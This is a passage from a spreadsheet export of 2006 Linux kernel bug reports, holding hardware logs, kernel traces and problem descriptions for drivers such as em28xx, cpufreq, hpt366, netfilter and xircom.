Bus:usbdev1.6_ep81 Dec 15 21:08:25 localhost PM: Adding info for No Bus:usbdev1.6_ep82 Dec 15 21:08:25 localhost PM: Adding info for No Bus:usbdev1.6_ep84 Dec 15 21:08:25 localhost PM: Adding info for usb:1-3:1.1 Dec 15 21:08:25 localhost PM: Adding info for usb:1-3:1.2 Dec 15 21:08:25 localhost PM: Adding info for No Bus:usbdev1.6_ep83 Dec 15 21:08:25 localhost Linux video capture interface: v2.00 Dec 15 21:08:25 localhost em28xx v4l2 driver version 0.0.1 loaded Dec 15 21:08:25 localhost em28xx new video device (eb1a:2881): interface 0, class 255 Dec 15 21:08:25 localhost em28xx #0: Alternate settings: 8 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 0, max size= 0 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 1, max size= 0 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 2, max size= 1448 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 3, max size= 2048 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 4, max size= 2304 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 5, max size= 2580 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 6, max size= 2892 Dec 15 21:08:25 localhost em28xx #0: Alternate setting 7, max size= 3072 Dec 15 21:08:25 localhost Tuner: registering extension (Xceive 3028 Tuner) Dec 15 21:08:25 localhost input: em2880/em2870 remote control as /class/input/input3 Dec 15 21:08:25 localhost em28xx-input.c: remote control handler attached Dec 15 21:08:25 localhost PM: Adding info for No Bus:i2c-0 Dec 15 21:08:25 localhost PM: Adding info for i2c:0-0050 Dec 15 21:08:25 localhost attach_inform: eeprom detected. Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 00: 1a eb 67 95 1a eb 81 28 58 12 5c 00 6a 20 6a 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 10: 00 00 04 57 64 57 00 00 60 f4 00 00 02 02 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 20: 56 00 01 00 00 00 02 00 b8 00 00 00 5b 1e 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 30: 00 00 20 40 20 80 02 20 10 02 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 60: 00 00 00 00 00 00 00 00 00 00 20 03 55 00 53 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 70: 42 00 20 00 32 00 38 00 38 00 31 00 20 00 56 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 80: 69 00 64 00 65 00 6f 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom e0: 5a 00 55 aa 79 55 54 03 00 17 98 01 00 00 00 00 Dec 15 21:08:25 localhost em28xx #0: i2c eeprom f0: 0c 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 Dec 15 21:08:25 localhost EEPROM ID= 0x9567eb1a Dec 15 21:08:25 localhost Vendor/Product ID= eb1a:2881 Dec 15 21:08:25 localhost AC97 audio (5 sample rates) Dec 15 21:08:25 localhost USB Remote wakeup capable Dec 15 21:08:25 localhost 500mA max power Dec 15 21:08:25 localhost Table at 0x04, strings=0x206a, 0x006a, 0x0000 Dec 15 21:08:25 localhost tuner 0-0061: chip found @ 0xc2 (em28xx #0) Dec 15 21:08:25 localhost PM: Adding info for i2c:0-0061 Dec 15 21:08:25 localhost attach inform (default): detected I2C address c2 Dec 15 21:08:25 localhost Tuner: setting up tuner core extension for: Xceive 3028 Tuner Dec 15 21:08:25 localhost Loading base firmware: xc3028_init0.i2c.fw Dec 15 21:08:26 localhost Loading default analogue TV settings: xc3028_BG_PAL_A2_A.i2c.fw Dec 15 21:08:26 localhost PM: Adding info for i2c:0-005c Dec 15 21:08:26 localhost attach_inform: tvp5150 detected. Dec 15 21:08:26 localhost tvp5150 0-005c: tvp5150am1 detected. Dec 15 21:08:26 localhost em28xx-video.c: requesting em2880-dvb! Dec 15 21:08:26 localhost em28xx #0: V4L2 VBI device registered as /dev/vbi0 Dec 15 21:08:27 localhost em28xx #0: V4L2 device registered as /dev/video0 Dec 15 21:08:27 localhost em28xx #0: Found Pinnacle Hybrid Pro Dec 15 21:08:27 localhost usbcore: registered new interface driver em28xx</t>
  </si>
  <si>
    <t>HP Compaq nx7400 "bad state"</t>
  </si>
  <si>
    <t>2006-12-16 02:32 UTC</t>
  </si>
  <si>
    <t>Calorì Alessandro</t>
  </si>
  <si>
    <t>2007-03-09 08:42 UTC</t>
  </si>
  <si>
    <t>Distribution: openSuSE, Ubuntu, Fedora Core (maybe others) Hardware Environment: HP Compaq nx7400 Software Environment: X.org 7.1.99 - KDE 3.5.5 Problem Description: This laptop, as many others from HP, has this problem: when the computer it's booted in a Linux environment and then shut down or rebooted the system falls in a "bad state" which causes: 10/20 seconds longer boot procedure and battery status locked (doesn't update). The "bad state" is persistent! This had already been reported in bug #6455 but it's not solved yet... Steps to reproduce: Turn on and then shut down or reboot. Workarounds: 1) When the laptop is off, detach AC adapter and battery for a while (some models require at least 2 minutes), the next boot will be normal; 2) If PS/2 mouse support is compiled as a module (psmouse), remove that module before shutdown/reboot. More info at: http://emisca.altervista.org/nx7400/ (it's not made by me but I have the same computer).</t>
  </si>
  <si>
    <t>New device id for K8M890 in via-agp.c</t>
  </si>
  <si>
    <t>2006-12-16 06:07 UTC</t>
  </si>
  <si>
    <t>Jon Nettleton</t>
  </si>
  <si>
    <t>2007-06-05 23:23 UTC</t>
  </si>
  <si>
    <t>This is new hardware that works with the existing code. The only change needed is the device id added for detection.</t>
  </si>
  <si>
    <t>Audigy NX normal playback impossible</t>
  </si>
  <si>
    <t>2006-12-16 14:41 UTC</t>
  </si>
  <si>
    <t>Denis Zalewsky</t>
  </si>
  <si>
    <t>2008-08-30 13:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Gentoo Hardware Environment: Dell Inspiron 700m i686 Intel(R) Pentium(R) M processor 1.60GHz $lsusb Bus 004 Device 007: ID 041e:3020 Creative Technology, Ltd SoundBlaster Audigy 2 NX Bus 004 Device 005: ID 0566:3002 Monterey International Corp. Bus 004 Device 004: ID 04d9:0499 Holtek Semiconductor, Inc. Bus 004 Device 003: ID 0451:2046 Texas Instruments, Inc. TUSB2046 Hub Bus 004 Device 002: ID 05e3:0606 Genesys Logic, Inc. $lspci 00:00.0 Host bridge: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.1 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.3 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 83) 00:1f.0 ISA bridge: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 03) 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 03) 00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 03) 02:01.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05) 02:04.0 CardBus bridge: Texas Instruments PCI7420 CardBus Controller 02:04.1 CardBus bridge: Texas Instruments PCI7420 CardBus Controller 02:04.2 FireWire (IEEE 1394): Texas Instruments PCI7x20 1394a-2000 OHCI Two-Port PHY/Link-Layer Controller 02:04.3 Mass storage controller: &lt;pci_lookup_name: buffer too small&gt; 02:05.0 Ethernet controller: Broadcom Corporation BCM4401-B0 100Base-TX (rev 02) Software Environment: Problem Description: playback through module usbaudio using Audigy NX breaks approx. 1 time in 10-15 sec and continues ~2 sec later skipping several seconds of sound. Looking into kernel execution shows that usb driver returns EL2NSYNC in snd_complete_sync_urb() that calls snd_pcm_stop(). Steps to reproduce: play sound longer than ~20 sec by means of any audio player P.S. It seems exactly similar problem has been discussed in threads "[PATCH 15/15] usbaudio retries EL2NSYNC" and "[PATCH 15/15] ehci-hcd: full-featured EHCI budgeter/scheduler" (e.g. see http://www.mail-archive.com/linux-usb-devel@lists.sourceforge.net/msg47614.html )</t>
  </si>
  <si>
    <t>Supermicro X7DB8+ Boot failure</t>
  </si>
  <si>
    <t>2.6.20-rc1+sysfs patch</t>
  </si>
  <si>
    <t>2006-12-16 22:21 UTC</t>
  </si>
  <si>
    <t>2007-01-03 18:08 UTC</t>
  </si>
  <si>
    <t>A Supermicro X7DB8+ does not boot -- SCSI driver dies, apparently due to lack of interrupts. First interesting difference in dmest without and with the sysfs patch below: &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0.BPD0.PXH0._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0.BPD0.PXH1._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0.BPD2._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMF3._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P4._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P6._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEX0._PRT] &lt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCIB._PRT] 268a318,327 &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2._PRT] &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0._PRT] &gt; ACPI Exception (pci_bind-0153): AE_NOT_FOUND, Invalid ACPI-PCI context for parent device BPD0 [20061109] &gt; ACPI Exception (pci_bind-0153): AE_NOT_FOUND, Invalid ACPI-PCI context for parent device BPD0 [20061109] &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMD0.BPD2._PRT] &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P2.BMF3._PRT] &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P4._PRT] &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P6._PRT] &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEX0._PRT] &gt; ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCIB._PRT]</t>
  </si>
  <si>
    <t>linux-2.6-20-rc1: kernel BUG at drivers/cpufreq/cpufreq_userspace.c</t>
  </si>
  <si>
    <t>linux-2.6.20-rc1</t>
  </si>
  <si>
    <t>2006-12-17 11:20 UTC</t>
  </si>
  <si>
    <t>Berthold Cogel</t>
  </si>
  <si>
    <t>2006-12-18 16:59 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: linux-2.6.19.1 Distribution:Debian unstable/testing Hardware Environment: Acer Extensa 3002 WLMi Software Environment: linux-2.6.20-rc1 (vanilla, from kernel.org, nor external patches. Gnu C 4.1.2 Gnu make 3.81 binutils 2.17 util-linux 2.12r mount 2.12r module-init-tools 3.3-pre2 e2fsprogs 1.40-WIP reiserfsprogs 3.6.19 xfsprogs 2.8.18 pcmciautils 014 PPP 2.4.4 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Procps 3.2.7 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 5.97 udev 103 wireless-tools 28 Problem Description: I've got a kernel bug with linux-2.6.20-rc1 which causes the system init to block. I have to reset the system. Dec 17 19:12:56 localhost kernel: kernel BUG at drivers/cpufreq/cpufreq_userspace.c:140! Dec 17 19:12:56 localhost kernel: invalid opcode: 0000 [#1] Dec 17 19:12:56 localhost kernel: PREEMPT Dec 17 19:12:56 localhost kernel: Modules linked in: acpi_cpufreq freq_table processor sg scsi_mod usbhid hid joydev nsc_ircc pcmcia snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm_oss snd_mixer_oss firmware_class snd_pcm snd_timer irda tifm_7xx1 tifm_sd mmc_block mmc_core ide_cd crc_ccitt i2c_i801 snd soundcore snd_page_alloc tifm_core psmouse ohci1394 ieee1394 ehci_hcd uhci_hcd yenta_socket rsrc_nonstatic pcmcia_core rtc pcspkr cdrom usbcore intel_agp agpgart evdev unix Dec 17 19:12:56 localhost kernel: CPU: 0 Dec 17 19:12:56 localhost kernel: EIP: 0060:[&lt;c022fe0d&gt;] Not tainted VLI Dec 17 19:12:56 localhost kernel: EFLAGS: 00010246 (2.6.20-rc1-vanilla #1) Dec 17 19:12:56 localhost kernel: EIP is at cpufreq_governor_userspace+0x32/0x134 Dec 17 19:12:56 localhost kernel: eax: c1b85480 ebx: c1b85480 ecx: c0308220 edx: 00000000 Dec 17 19:12:56 localhost kernel: esi: 00000000 edi: ffffffea ebp: c1b85480 esp: f7f2bdb4 Dec 17 19:12:56 localhost kernel: ds: 007b es: 007b ss: 0068 Dec 17 19:12:56 localhost kernel: Process modprobe (pid: 2098, ti=f7f2a000 task=c1938a70 task.ti=f7f2a000) Dec 17 19:12:56 localhost kernel: Stack: c1b85480 00000000 00000001 c022ef25 f7f2be04 00000000 00000000 c1b85480 Dec 17 19:12:56 localhost kernel: c022f023 c1b854ac c1b85480 f7f2be04 c1b854ac c022f1e4 c1b85480 f9b1c918 Dec 17 19:12:56 localhost kernel: f7f2bea4 c022fb42 c03498e8 00000000 00000001 00000002 00000000 00186a00 Dec 17 19:12:56 localhost kernel: Call Trace: Dec 17 19:12:56 localhost kernel: [&lt;c022ef25&gt;] __cpufreq_governor+0x56/0x87 Dec 17 19:12:56 localhost kernel: [&lt;c022f023&gt;] __cpufreq_set_policy+0xcd/0x100 Dec 17 19:12:56 localhost kernel: [&lt;c022f1e4&gt;] cpufreq_set_policy+0x2a/0x5f Dec 17 19:12:56 localhost kernel: [&lt;c022fb42&gt;] cpufreq_add_dev+0x1f1/0x269 Dec 17 19:12:56 localhost kernel: [&lt;c022f1b2&gt;] handle_update+0x0/0x8 Dec 17 19:12:56 localhost kernel: [&lt;c020f7ff&gt;] sysdev_driver_register+0x4c/0x94 Dec 17 19:12:56 localhost kernel: [&lt;c022fd5c&gt;] cpufreq_register_driver+0xa2/0x112 Dec 17 19:12:56 localhost kernel: [&lt;f9b3504a&gt;] acpi_cpufreq_init+0x4a/0x4c [acpi_cpufreq] Dec 17 19:12:56 localhost kernel: [&lt;c012e538&gt;] sys_init_module+0x147a/0x15b3 Dec 17 19:12:56 localhost kernel: [&lt;c0102c56&gt;] sysenter_past_esp+0x5f/0x85 Dec 17 19:12:56 localhost kernel: ======================= Dec 17 19:12:56 localhost kernel: Code: 08 83 fa 02 74 7f 83 fa 03 0f 84 bb 00 00 00 31 ff 4a 0f 85 0f 01 00 00 bf ea ff ff ff 85 f6 0f 85 02 01 00 00 83 78 20 00 75 04 &lt;0f&gt; 0b eb fe b8 4c 82 30 c0 e8 dd 2c 05 00 8d 43 58 ba 58 82 30 Dec 17 19:12:56 localhost kernel: EIP: [&lt;c022fe0d&gt;] cpufreq_governor_userspace+0x32/0x134 SS:ESP 0068:f7f2bdb4 Dec 17 19:12:56 localhost kernel: &lt;7&gt;ieee80211_crypt: registered algorithm 'NULL' This problem doesn't appear with linux-2.6.19.1 Steps to reproduce: Boot the system with linux-2.6.20-rc1 Regards, Berthold Cogel</t>
  </si>
  <si>
    <t>raw1394 should in- &amp; decrement refcount of ohci1394 and pcilynx</t>
  </si>
  <si>
    <t>hpt366 does not find drives</t>
  </si>
  <si>
    <t>2.4.19 and 2.6.*</t>
  </si>
  <si>
    <t>2006-12-17 21:58 UTC</t>
  </si>
  <si>
    <t>David Young</t>
  </si>
  <si>
    <t>2010-03-27 11:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur:2.4.18 Distribution:redhat 7.2, slackware 10.[1-2] fedora-fc[5-6] Hardware Environment:iWill dual pIII Tualatin 1.13G 512K cache 2GbRAM four IDE channels on motherboard, two (hda,hdb,hdc) controlled by VIA ATA33 and two (hde,hdg) by HPT366 (rev 04) ATA66hda: 78165360 sectors (40021 MB) w/2048KiB Cache, CHS=4865/255/63, UDMA(100) hda: 78165360 sectors (40021 MB) w/2048KiB Cache, CHS=4865/255/63, UDMA(100) hda: WDC WD400BB-00CAA0, ATA DISK drive hdc: 268435455 sectors (137439 MB) w/8192KiB Cache, CHS=266305/16/63, UDMA(100) hdc: ST3160023A, ATA DISK drive hde: 78165360 sectors (40021 MB) w/2048KiB Cache, CHS=77545/16/63, UDMA(100) hde: ST340016A, ATA DISK drive hdg: 268435455 sectors (137439 MB) w/8192KiB Cache, CHS=266305/16/63, UDMA(100) hdg: WDC WD1600JB-00GVA0, ATA DISK drive hdb: ATAPI 52X CD-ROM drive, 128kB Cache, UDMA(33) Software Environment:redhat 7.2, file server, console mode only Problem Description:When trying to upgrade the kernel or the distribution from 2.4.18 to anything newer the hpt driver fails. If nodma is set with 2.4.33+ then it will eventually bring hde online slowly and hdg will function normally. When using any 2.6 kernel, upto and including 2.6.19 + 20rc1 patch, neither of the drives are detected. Steps to reproduce:Insert new distribution CDROM (Fedora FC5, FC6, Slackware 10.1, 10.2) and boot from cdrom. Only VIA attached drives are detected. I believe this might be connected to #1128.</t>
  </si>
  <si>
    <t>unregister_netdev() should return unregister_netdevice() return code</t>
  </si>
  <si>
    <t>2006-12-18 14:52 UTC</t>
  </si>
  <si>
    <t>Benjamin Li</t>
  </si>
  <si>
    <t>2007-06-05 23:22 UTC</t>
  </si>
  <si>
    <t>net/core/dev.c:unregister_netdev() function is a wrapper around net/core/dev.c:unregister_netdevice(). The unregister_netdevice() function returns a return code while unregister_netdev() currently does not. For completeness, we should pass the return code from unregister_netdevice() all the way to the caller. unregister_netdev() should not swallow the return code.</t>
  </si>
  <si>
    <t>pata_pcmcia fails to access CF card</t>
  </si>
  <si>
    <t>2006-12-19 01:10 UTC</t>
  </si>
  <si>
    <t>2007-06-05 06:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none known Distribution: debian (kernel self-compiled) Hardware Environment: HP Compaq nx6110 Software Environment: Debian GNU/Linux Problem Description: pata_pcmcia fails to access all tried CF cards, while ide_cs does. Steps to reproduce: compile kernel without IDE, but with ATA support and cardbus in the kernel and pata_pcmcia as module. boot it, insert CF card into PCMCIA adapter, insert into slot. dmesg: [30593.614000] pccard: PCMCIA card inserted into slot 0 [30593.614000] cs: memory probe 0x0c0000-0x0fffff: excluding 0xc0000-0xcffff 0xe0000-0xfffff [30593.642000] cs: memory probe 0x10000000-0x11ffffff: excluding 0x10000000-0x11ffffff [30593.642000] cs: memory probe 0x60000000-0x60ffffff: clean. [30593.656000] cs: memory probe 0xa0000000-0xa0ffffff: clean. [30593.670000] cs: memory probe 0xd0000000-0xd03fffff: excluding 0xd0000000-0xd003ffff [30593.684000] pcmcia: registering new device pcmcia0.0 [30593.803000] ata3: PATA max PIO0 cmd 0x3100 ctl 0x310E bmdma 0x0 irq 16 [30593.803000] scsi2 : pata_pcmcia [30593.956000] ata3.00: CFA, max PIO0, 1018080 sectors: LBA [30593.956000] ata3.00: ata3: dev 0 multi count 0 [30593.956000] ata3.00: failed to set xfermode (err_mask=0x1) [30593.956000] ata3.00: disabled remove card. rmmod pata_pcmcia, build and install modules ide-core, ide-disk and ide-cs. modprobe ide-cs. [31862.754000] Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 [31862.755000] ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx [31870.289000] pccard: PCMCIA card inserted into slot 0 [31870.289000] pcmcia: registering new device pcmcia0.0 [31870.330000] Probing IDE interface ide0... [31870.594000] hda: SAMSUNG CF/ATA, CFA DISK drive [31870.900000] ide0 at 0x3100-0x3107,0x310e on irq 16 [31870.900000] ide-cs: hda: Vpp = 0.0 [31870.938000] hda: max request size: 128KiB [31870.938000] hda: 1018080 sectors (521 MB) w/0KiB Cache, CHS=1010/16/63 [31870.938000] hda: hda1 Accessing the CF card works this way.</t>
  </si>
  <si>
    <t>change in behavior of OUTPUT chain reject rule in 2.6.19?</t>
  </si>
  <si>
    <t>2006-12-19 19:53 UTC</t>
  </si>
  <si>
    <t>Mike Accetta</t>
  </si>
  <si>
    <t>2007-02-25 08:42 UTC</t>
  </si>
  <si>
    <t>networking_netfilter-iptables@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Between 2.6.18 and 2.6.19 (and 2.6.19.1) we've observed that a reject rule on the OUTPUT chain no longer causes a connection attempt to abort immediately with "Connection refused". As a specific example, this rule iptables -A OUTPUT -p tcp --destination-port 23 \ --destination 10.0.20.1 -j REJECT --reject-with tcp-reset will cause a telnet connection to 10.0.20.1 to fail immediately under 2.6.18 but will take minutes to timeout under 2.6.19. A "git bisect" identifies change 9d02002d2dc2c7423e5891b97727fde4d667adf1 as the culprit. The change description gives no hint that this effect was intended. Is this a regression?</t>
  </si>
  <si>
    <t>(net xircom_cb, xircom_tulip_cb) When card inserted, dmesg says that ETH1 will be used, but ifconfig configures adapter on ETH2.</t>
  </si>
  <si>
    <t>2006-12-20 03:53 UTC</t>
  </si>
  <si>
    <t>2007-12-28 02:39 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19.1 Distribution: Debian Etch Hardware Environment: Acer TravelMate 242 with xircom card Software Environment: Problem Description: When card inserted, dmesg says that ETH1 will be used, but ifconfig configures adapter on ETH2. pccard: CardBus card inserted into slot 1 PCI: Enabling device 0000:06:00.1 (0000 -&gt; 0003) ACPI: PCI Interrupt 0000:06:00.1[A] -&gt; Link [LNKG] -&gt; GSI 10 (level, low) -&gt; IRQ 10 xircom_tulip_cb.c derived from tulip.c:v0.91 4/14/99 becker@scyld.com unofficial 2.4.x kernel port, version 0.92, June 27, 2006 PCI: Enabling device 0000:06:00.0 (0000 -&gt; 0003) ACPI: PCI Interrupt 0000:06:00.0[A] -&gt; Link [LNKG] -&gt; GSI 10 (level, low) -&gt; IRQ 10 PCI: Setting latency timer of device 0000:06:00.0 to 64 eth1: Xircom Cardbus Adapter rev 3 at 0x3c00, 00:10:A4:9D:23:33, IRQ 10. eth1: MII transceiver #0 config 3100 status 7809 advertising 01e1. 0000:06:00.1: ttyS0 at I/O 0x3c80 (irq = 10) is a 16550A eth2: Link is up, running at 100Mbit half-duplex Netfilter messages via NETLINK v0.30. ip_conntrack version 2.4 (8055 buckets, 64440 max) - 228 bytes per conntrack ip_tables: (C) 2000-2006 Netfilter Core Team eth2: Link is down lsmod: Module Size Used by xt_tcpudp 3200 3 iptable_filter 3200 1 ipt_MASQUERADE 3712 6 ip_nat_irc 2816 0 ip_conntrack_irc 7056 1 ip_nat_irc ip_nat_ftp 3584 0 ip_conntrack_ftp 7696 1 ip_nat_ftp iptable_nat 6532 1 ip_nat 17836 4 ipt_MASQUERADE,ip_nat_irc,ip_nat_ftp,iptable_nat ip_tables 13256 2 iptable_filter,iptable_nat ip_conntrack 50060 7 ipt_MASQUERADE,ip_nat_irc,ip_conntrack_irc,ip_nat_ftp,ip_conntrack_ftp,iptable_nat,ip_nat nfnetlink 6808 2 ip_nat,ip_conntrack x_tables 14852 4 xt_tcpudp,ipt_MASQUERADE,iptable_nat,ip_tables xircom_cb 10240 0 xircom_tulip_cb 17584 0 ppp_deflate 6144 0 zlib_deflate 18072 1 ppp_deflate bsd_comp 5888 0 ppp_async 10752 1 ppp_generic 26644 7 ppp_deflate,bsd_comp,ppp_async slhc 6272 1 ppp_generic bnep 15104 3 rfcomm 36252 7 hidp 16000 4 l2cap 22788 24 bnep,rfcomm,hidp lp 11332 0 eeprom 7312 0 hci_usb 16284 9 bluetooth 50404 17 bnep,rfcomm,hidp,l2cap,hci_usb eth1394 18948 0 8250_pci 20480 0 8250 21476 1 8250_pci serial_core 20480 1 8250 snd_intel8x0 31900 0 snd_intel8x0m 17164 5 usbhid 37664 0 snd_ac97_codec 92960 2 snd_intel8x0,snd_intel8x0m snd_ac97_bus 2432 1 snd_ac97_codec nsc_ircc 18064 0 hostap_cs 59028 0 hostap 105604 1 hostap_cs snd_pcm 67592 5 snd_intel8x0,snd_intel8x0m,snd_ac97_codec snd_timer 21764 1 snd_pcm irda 114360 1 nsc_ircc rtc 13108 0 ieee80211_crypt 6144 1 hostap ide_cd 37536 0 snd 50276 13 snd_intel8x0,snd_intel8x0m,snd_ac97_codec,snd_pcm,snd_timer crc_ccitt 2304 2 ppp_async,irda parport_pc 33188 1 parport 36680 2 lp,parport_pc ohci1394 33200 0 ieee1394 92600 2 eth1394,ohci1394 snd_page_alloc 10248 3 snd_intel8x0,snd_intel8x0m,snd_pcm pcspkr 3072 0 8139too 24320 0 mii 5760 1 8139too psmouse 37256 0 i2c_i801 7692 0 cdrom 34464 1 ide_cd iTCO_wdt 10400 1 ehci_hcd 29576 0 ohci_hcd 19204 0 uhci_hcd 21896 0 lspci: 00:00.0 Host bridge: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.1 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:00.3 System peripheral: Intel Corporation 82852/82855 GM/GME/PM/GMV Processor to I/O Controller (rev 02) 00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:02.1 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev 83) 00:1f.0 ISA bridge: Intel Corporation 82801DBM (ICH4-M) LPC Interface Bridge (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801DBM (ICH4-M) IDE Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller (rev 03) 00:1f.5 Multimedia audio controller: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller (rev 03) 00:1f.6 Modem: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Modem Controller (rev 03) 01:04.0 CardBus bridge: Texas Instruments PCI1520 PC card Cardbus Controller (rev 01) 01:04.1 CardBus bridge: Texas Instruments PCI1520 PC card Cardbus Controller (rev 01) 01:0a.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) 06:00.0 Ethernet controller: Xircom Cardbus Ethernet 10/100 (rev 03) 06:00.1 Serial controller: Xircom Cardbus Ethernet + 56k Modem (rev 03) Steps to reproduce: insert card, configure adapter</t>
  </si>
  <si>
    <t>2.6.19.2</t>
  </si>
  <si>
    <t>2006-12-21 13:06 UTC</t>
  </si>
  <si>
    <t>Grzegorz Andruszkiewicz</t>
  </si>
  <si>
    <t>2007-07-10 00:15 UTC</t>
  </si>
  <si>
